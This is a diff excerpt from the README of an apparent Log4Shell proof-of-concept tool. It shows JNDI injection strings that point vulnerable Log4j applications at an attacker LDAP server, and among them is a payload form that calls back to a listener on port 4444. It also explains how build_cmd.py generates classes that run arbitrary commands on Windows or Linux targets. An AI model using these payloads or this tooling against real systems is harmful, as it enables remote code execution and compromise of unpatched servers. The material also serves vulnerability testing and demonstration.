s-retlaw/l4s_poc/README.md

 listening on port 4444 it would look like this :
 '${jndi:ldap://10.20.30.40:1389/#MM_20_30_40_50_4444}'

+#### Building executable commands
+You can build classes that will launch executable on the source system.
+You can have different commands for windows or linux based systems.
+For instance to create a class called TestCmd that will launch a calculator on Windows systems and Firefox on linux systems run :
+**python3 build_cmd.py TestCmd -w "Calc.exe" -l "firefox"**

+You can have multiple pre built classes.
+If you do not specify a command for the target os then nothing is executed.
+Note these commands are run as CMD \c "your command" on windows and /bin/sh -c "your command" on linux.

+To trigger the above command use the name of the class you created i.e :
+'${jndi:ldap://10.20.30.40:1389/#TestCmd'

 ## Clients
 The clients directory has 2 clients that can be executed.
 One is a simple command line program that will write an error log for whatever the 1st param passed in is.